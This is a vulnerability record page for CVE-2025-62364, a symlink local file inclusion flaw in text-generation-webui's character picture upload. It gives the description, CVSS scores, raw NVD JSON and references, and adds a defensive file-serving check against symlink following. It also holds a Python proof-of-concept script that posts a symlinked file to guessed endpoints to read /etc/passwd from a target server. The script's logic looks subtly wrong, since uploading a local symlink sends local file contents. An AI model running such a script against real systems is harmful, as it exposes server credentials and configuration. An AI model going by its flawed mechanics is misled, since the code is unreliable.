Security Vulnerability Report

CVE-2025-62364

Published: 2025-10-13 21:15:36
Last Modified: 2026-04-15 00:35:42

Description

text-generation-webui is an open-source web interface for running Large Language Models. In versions through 3.13, a Local File Inclusion vulnerability exists in the character picture upload feature. An attacker can upload a text file containing a symbolic link to an arbitrary file path. When the application processes the upload, it follows the symbolic link and serves the contents of the targeted file through the web interface. This allows an unauthenticated attacker to read sensitive files on the server, potentially exposing system configurations, credentials, and other confidential information. This vulnerability is fixed in 3.14. No known workarounds exist.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Weakness: CWE-59 (Improper Link Resolution Before File Access, "Link Following")

Configurations (Affected Products)

No structured configuration data available. Affected product:

oobabooga/text-generation-webui <= 3.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-62364 - text-generation-webui Local File Inclusion via Symlink
PoC for demonstrating the character picture upload LFI vulnerability.
"""
import os
import requests
import tempfile

TARGET_URL = "http://target-server:7860"  # Default text-generation-webui port
TARGET_FILE = "/etc/passwd"  # File to read from the server


def create_symlink_file(target_path, output_path):
    """Create a text file containing a symlink to the target file."""
    # Remove existing file/symlink
    if os.path.exists(output_path) or os.path.islink(output_path):
        os.remove(output_path)
    # Create symbolic link
    os.symlink(target_path, output_path)
    print(f"[+] Created symlink: {output_path} -> {target_path}")


def exploit(target_url, file_to_read):
    """Exploit the LFI vulnerability via character picture upload."""
    # Step 1: Create a symlink file locally
    tmp_file = tempfile.mktemp(suffix=".txt")
    create_symlink_file(file_to_read, tmp_file)

    # Step 2: Upload the symlink file via the character picture upload endpoint
    upload_url = f"{target_url}/upload_character_picture"
    with open(tmp_file, "rb") as f:
        files = {"file": (os.path.basename(tmp_file), f, "text/plain")}
        response = requests.post(upload_url, files=files)
    print(f"[+] Upload response status: {response.status_code}")
    print(f"[+] Response body: {response.text[:500]}")

    # Step 3: Access the uploaded file to read its contents
    # The uploaded file path is typically returned or predictable
    # Access the file through the web interface
    file_url = f"{target_url}/characters/picture/{os.path.basename(tmp_file)}"
    content_response = requests.get(file_url)
    print(f"[+] File content ({file_to_read}):\n{content_response.text}")

    # Cleanup
    os.remove(tmp_file)
    return content_response.text


if __name__ == "__main__":
    exploit(TARGET_URL, TARGET_FILE)
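As an added defensive counterpart (example code written for this page, not the project's own code and not its 3.14 fix, whose details this record does not give): a file-serving check that refuses symlinks and anything resolving outside the upload directory, which is the CWE-59 pattern this CVE describes. It assumes a POSIX host (O_NOFOLLOW) and the directory and file names it uses are constructed in a temporary directory.

```python
"""Serve files from an upload directory without following symlinks (a CWE-59 defence)."""
import os
import stat
import tempfile


class UnsafeUploadPath(Exception):
    """Raised when a requested upload must not be served."""


def read_upload(upload_dir: str, name: str, limit: int = 1 << 20) -> bytes:
    """Return the bytes of `name` inside `upload_dir`, or raise UnsafeUploadPath.
    `name` must be a bare filename; O_NOFOLLOW (POSIX) makes the kernel refuse a
    symlink in the final component; the result must be a regular file under base."""
    if not name or os.path.basename(name) != name or name in (".", ".."):
        raise UnsafeUploadPath(f"non-bare filename {name!r}")
    base = os.path.realpath(upload_dir)
    candidate = os.path.join(base, name)
    try:
        fd = os.open(candidate, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as exc:  # ELOOP when the final component is a symlink
        raise UnsafeUploadPath(f"cannot open {name!r}: {exc.strerror}") from exc
    with os.fdopen(fd, "rb") as f:
        if not stat.S_ISREG(os.fstat(f.fileno()).st_mode):
            raise UnsafeUploadPath(f"{name!r} is not a regular file")
        # Defence in depth: what we opened must still resolve inside upload_dir.
        if os.path.commonpath([base, os.path.realpath(candidate)]) != base:
            raise UnsafeUploadPath(f"{name!r} resolves outside the upload directory")
        return f.read(limit)


def demo() -> dict:
    """Constructed scenario: one legitimate upload and one planted symlink (hypothetical names)."""
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "characters")
        os.mkdir(uploads)
        secret = os.path.join(root, "config.txt")  # stands in for a file outside uploads
        with open(secret, "w") as f:
            f.write("api_key=EXAMPLE-NOT-REAL\n")
        with open(os.path.join(uploads, "alice.png"), "wb") as f:
            f.write(b"\x89PNG-sample")
        os.symlink(secret, os.path.join(uploads, "evil.txt"))
        results = {}
        for name in ("alice.png", "evil.txt", "../config.txt"):
            try:
                results[name] = read_upload(uploads, name)
            except UnsafeUploadPath as exc:
                results[name] = f"blocked: {exc}"
        return results
```

Running demo() serves the regular PNG and blocks both the symlink and the traversal name; the same check belongs on the extraction side too, so that a symlink never lands in the upload directory in the first place.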

References

https://github.com/oobabooga/text-generation-webui/commit/282aa1918907fceec7f903d3dc2bc8492ce8e885
https://github.com/oobabooga/text-generation-webui/security/advisories/GHSA-66rw-q8w5-c2hg

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62364",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T21:15:35.560",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "text-generation-webui is an open-source web interface for running Large Language Models. In versions through 3.13, a Local File Inclusion vulnerability exists in the character picture upload feature. An attacker can upload a text file containing a symbolic link to an arbitrary file path. When the application processes the upload, it follows the symbolic link and serves the contents of the targeted file through the web interface. This allows an unauthenticated attacker to read sensitive files on the server, potentially exposing system configurations, credentials, and other confidential information. This vulnerability is fixed in 3.14. No known workarounds exist."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-59" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/oobabooga/text-generation-webui/commit/282aa1918907fceec7f903d3dc2bc8492ce8e885",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/oobabooga/text-generation-webui/security/advisories/GHSA-66rw-q8w5-c2hg",
        "source": "[email protected]"
      }
    ]
  }
}